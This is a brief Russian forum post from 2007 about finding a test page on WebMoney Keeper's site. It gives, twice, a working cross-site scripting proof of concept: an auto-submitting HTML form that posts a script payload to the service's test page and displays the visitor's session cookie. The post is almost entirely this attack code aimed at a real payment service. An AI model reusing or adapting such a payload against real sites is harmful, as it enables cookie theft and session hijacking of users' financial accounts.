omg!
04.02.2007, 22:39
нашел случайно - в страничках кипера увидел закоментенный блок с линком на тестовую страницу:
<form action="http://keeper.webmoney.ru/docs/test.asp" METHOD="post">
<input type=hidden name='XSS' value='<script>alert(document.cookie + "\nXSS by KPbIC(myiworm@mail.ru)")</script>'>
</form>
<script>document.forms[0].submit();</script>
<form action="http://keeper.webmoney.ru/docs/test.asp" METHOD="post">
<input type=hidden name='XSS' value='<script>alert(document.cookie + "\nXSS by KPbIC(myiworm@mail.ru)")</script>'>
</form>
<script>document.forms[0].submit();</script>